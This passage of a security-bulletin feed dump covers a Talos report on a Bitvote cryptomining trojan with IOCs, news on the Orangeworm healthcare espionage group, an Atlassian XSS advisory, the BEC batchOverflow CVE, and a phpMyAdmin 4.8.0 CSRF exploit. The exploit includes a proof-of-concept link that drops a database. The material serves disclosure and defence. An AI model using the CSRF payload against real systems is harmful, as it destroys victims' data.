This is easily checked using the [Bitvote block explorer](<https://www.google.com/url?q=https://block.bitvote.one/&sa=D&ust=1524498497045000>) and searching for transactions to the address 1C9BLDgbx8geYzc5sNPDUhpHWFqAEqHRHB, which belongs to the botnet. \n \nFigure: Despite the moderate botnet size, the attackers earned more than $1,500.\n\n \nThe top hash rate of 340 Khash/s indicates around 2,500 bots participating in the mining activity, assuming an average hash rate of 125 hashes per second for a typical CPU. It seems the attackers were betting on BTV, but the payback would have been much higher had they mined another, more established cryptocurrency such as Monero. \n \nFigure: After a high initial hash rate the activity quickly dropped to 12 Khash/s\n\n \nThe mining operation started on Feb. 16, as can be seen in the [stats available](<https://www.google.com/url?q=http://www.vvpool.com/bitvote/1C9BLDgbx8geYzc5sNPDUhpHWFqAEqHRHB&sa=D&ust=1524498497047000>) on the vvpool.com website. \n \n\n\n### Conclusion\n\n \nWith the difficulties and unpredictability associated with the recent widespread ransomware attacks, it is not surprising that cyber criminals are turning toward mining cryptocurrencies. Besides well-established cryptocurrencies such as Monero, malicious actors are also becoming early adopters of newly created cryptocurrencies. Bitvote is just one of these, created as a bitcoin fork and launched on Jan. 20. The attackers created trojanized calculator applications with the intention of building a large pool of infected machines to mine Bitvote. 
\n \nApart from targeting a newly created cryptocurrency, this campaign is notable for using a kernel mode driver to provide the complete infrastructure for the final payload: downloading the payload, reloading the malware configuration, and hiding and protecting the malicious modules from detection and removal. \n \nUsing a kernel mode driver is quite an unusual method for everyday malware campaigns, and requires at least moderate technical knowledge on the part of the developers. The fact that the certificate used to sign the driver has an expired validity period points to a possible intention to target geographic regions where a smaller proportion of the user base runs the latest operating systems. \n \nAlthough this newly created cryptocurrency provided only limited returns, we can expect attackers to continue this trend in the future as more cryptocurrencies opt to allow mining with commodity desktop CPUs. \n \n\n\n### Coverage\n\n \nAdditional ways our customers can detect and block this threat are listed below. \n \nAdvanced Malware Protection ([AMP](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/advanced-malware-protection&sa=D&ust=1524498497049000>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \n[CWS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html&sa=D&ust=1524498497050000>) or [WSA](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html&sa=D&ust=1524498497050000>) web scanning prevents access to malicious websites and detects malware used in these attacks. 
\n \n[Email Security](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html&sa=D&ust=1524498497051000>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork security appliances such as [NGFW](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/firewalls/index.html&sa=D&ust=1524498497052000>), [NGIPS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html&sa=D&ust=1524498497052000>), and [Meraki MX](<https://www.google.com/url?q=https://meraki.cisco.com/products/appliances&sa=D&ust=1524498497053000>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html&sa=D&ust=1524498497054000>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://www.google.com/url?q=https://umbrella.cisco.com/&sa=D&ust=1524498497054000>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.google.com/url?q=https://www.snort.org/products&sa=D&ust=1524498497055000>). 
\n \n\n\n### IOCs\n\n \n\n\n#### Drivers\n\n \n\n\n#### Droppers (CalculatorXXXX.exe)\n\n \n\n\n#### Dropper Toolkit\n\n \n\n\n8185b8a3629dc1fb5090a12f0418ce91ee1908117487e3316f96ba17fa64a5db \n \n\n\n#### Modified Bitvote cpuminer\n\n \n\n\n87c27f08d1eaa1ad2addd6af381829c037d55186ceded7249d5af0a62e464032 \n \n\n\n#### Domains for configuration downloads\n\n \n\n\n#### Hardcoded URLs for downloads of payloads and newer driver versions (may be superseded by the new configuration downloaded from configuration sites) \n\n 
\n \n\n\n#### URLs for C2\n\n \n\n\nhxxp://down.rmb666.me/dr.php \n \n\n", "reporter": "noreply@blogger.com (Vanja Svajcer)", "published": "2018-04-23T09:44:00", "type": "talosblog", "title": "Cryptomining Campaign Returns Coal and Not Diamond", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-23T16:44:48", "id": "TALOSBLOG:66A9904BDE99019760E581153C5742BF", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/5RBkUbicJr4/cryptomining-campaign-returns-coal-not-diamond.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2018-04-23T21:59:51", "references": [], "description": "Security researchers have uncovered a new hacking group that is aggressively targeting healthcare organizations and related sectors across the globe to conduct corporate espionage. \n \nDubbed \"**Orangeworm**,\" the hacking group has been found installing a wormable trojan on machines hosting software used for controlling high-tech imaging devices, such as X-Ray and MRI machines, as well as machines used to assist patients in completing consent forms. \n \nAccording to a [new report](<https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia>) published by Symantec on Monday, the Orangeworm hacking group has been active since early 2015, targeting the systems of major international corporations based in the United States, Europe, and Asia with a primary focus on the healthcare sector. \n\n\n> \"We believe that these industries have also been targeted as part of a larger supply-chain attack in order for Orangeworm to get access to their intended victims related to healthcare,\" Symantec said.\n\nAfter getting into the victim's network, the attackers install a trojan, dubbed **Kwampirs**, which opens a backdoor on the compromised computers, allowing the attackers to remotely access equipment and steal sensitive data. \n \nWhile decrypting, the Kwampirs malware inserts a randomly generated string into its main DLL payload in an attempt to evade hash-based detection. The malware also starts a service on the compromised systems to persist and restart after the system reboots. \n \nKwampirs then collects some basic information about the compromised computers and sends it to a remote command-and-control server, which the group uses to determine whether the hacked system belongs to a researcher or is a high-value target. 
\n\n\nIf the victim is of interest, the malware then \"aggressively\" spreads itself across open network shares to infect other computers within the same organisation. \n \nTo gather additional information about the victim's network and compromised systems, the malware uses the system's built-in commands instead of third-party reconnaissance and enumeration tools. \n \nThese built-in commands help the attackers steal information, including \"any information pertaining to recently accessed computers, network adapter information, available network shares, mapped drives, and files present on the compromised computer.\" \n \nBesides healthcare providers and pharmaceutical companies, which account for nearly 40% of targets, Orangeworm has also launched attacks against other industries, including information technology, manufacturing, agriculture, and logistics. \n \nHowever, these industries are all connected to healthcare in some way: manufacturers that make medical devices, technology companies that offer services to clinics, and logistics firms that deliver healthcare products. \n\n\nAlthough the exact motive of Orangeworm is not clear and there's no information that could help determine the group's origins, Symantec believes the group is likely conducting espionage for commercial purposes, and there's no evidence that it's backed by a nation-state. \n\n\n> \"Based on the list of known victims, Orangeworm does not select its targets randomly or conduct opportunistic hacking,\" Symantec said. 
\"Rather, the group appears to choose its targets carefully and deliberately, conducting a good amount of planning before launching an attack.\"\n\nThe highest percentage of victims has been detected in the United States, followed by Saudi Arabia, India, Philippines, Hungary, United Kingdom, Turkey, Germany, Poland, Hong Kong, Sweden, Canada, France, and several other countries across the globe.\n", "edition": 1, "reporter": "Mohit Kumar", "published": "2018-04-23T07:53:00", "title": "Hackers Behind Healthcare Espionage Infect X-Ray and MRI Machines", "type": "thn", "enchantments": {}, "bulletinFamily": "info", "cvelist": [], "modified": "2018-04-23T18:53:15", "id": "THN:61F2090A7940FAC3917312F662B42C1B", "href": "https://thehackernews.com/2018/04/healthcare-cyber-attacks.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "atlassian": [{"lastseen": "2018-04-23T08:19:11", "references": [], "description": "The /browse/~raw resource in Atlassian Fisheye and Crucible before version 4.5.3 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the handling of response headers.", "edition": 1, "reporter": "security-metrics-bot", "published": "2018-04-23T03:35:33", "title": "XSS through header injection in the /browse/~raw resource - CVE-2018-5228", "type": "atlassian", "enchantments": {}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Crucible", "version": "4.4.3", "operator": "le"}, {"name": "Crucible", "version": "4.5.1", "operator": "le"}, {"name": "Crucible", "version": "4.6.0", "operator": "lt"}, {"name": "Crucible", "version": "4.5.3", "operator": "lt"}], "cvelist": ["CVE-2018-5228"], "modified": "2018-04-23T03:40:58", "id": "ATLASSIAN:CRUC-8201", "href": "https://jira.atlassian.com/browse/CRUC-8201", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2018-04-23T10:44:01", "references": ["https://peckshield.com/2018/04/22/batchOverflow/", "https://dasp.co/#item-3", 
"https://twitter.com/OKEx_/status/987967343983714304", "https://support.okex.com/hc/en-us/articles/360002944212-BeautyChain-BEC-Withdrawal-and-Trading-Suspended"], "description": "An integer overflow in the batchTransfer function of a smart contract implementation for Beauty Ecosystem Coin (BEC), the Ethereum ERC20 token used in the Beauty Chain economic system, allows attackers to accomplish an unauthorized increase of digital assets by providing two _receivers arguments in conjunction with a large _value argument, as exploited in the wild in April 2018, aka the \"batchOverflow\" issue. NOTE: the OKEx exchange suspended BEC trading as of 2018-04-22; however, the integer overflow in this codebase can still be exploited through transactions involving other exchanges and/or other tokens.", "edition": 1, "reporter": "NVD", "published": "2018-04-23T00:29:00", "title": "CVE-2018-10299", "type": "cve", "enchantments": {}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-10299"], "scanner": [], "modified": "2018-04-23T00:29:00", "cpe": [], "id": "CVE-2018-10299", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10299", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-23T20:02:53", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "revengsh", "published": "2018-04-23T00:00:00", "title": "phpMyAdmin 4.8.0 / 4.8.0-1 - Cross-Site Request Forgery Vulnerability", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10188"], "modified": "2018-04-23T00:00:00", "id": "1337DAY-ID-30227", "href": "https://0day.today/exploit/description/30227", "sourceData": "# Exploit Title: phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery\r\n# Software Link: https://www.phpmyadmin.net/\r\n# Author: @revengsh & @0x00FI\r\n# CVE: CVE-2018-10188\r\n# Category: Webapps\r\n \r\n \r\n#1. 
Description\r\n#The vulnerability exists due to failure in the \"/sql.php\" script to properly verify the source of HTTP request.\r\n#This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statement by sending a malicious request to a logged in user.\r\n#2. Proof of Concept: This example sends HTTP GET crafted request in order to drop the specified database.\r\n \r\n \r\n<html>\r\n <body>\r\n <a href=\"http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]\">\r\n Drop database\r\n </a>\r\n </body>\r\n</html>\r\n \r\n#3. Solution: Upgrade to phpMyAdmin 4.8.0-1 or newer.\r\n#4. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10188\n\n# 0day.today [2018-04-23] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30227"}]}}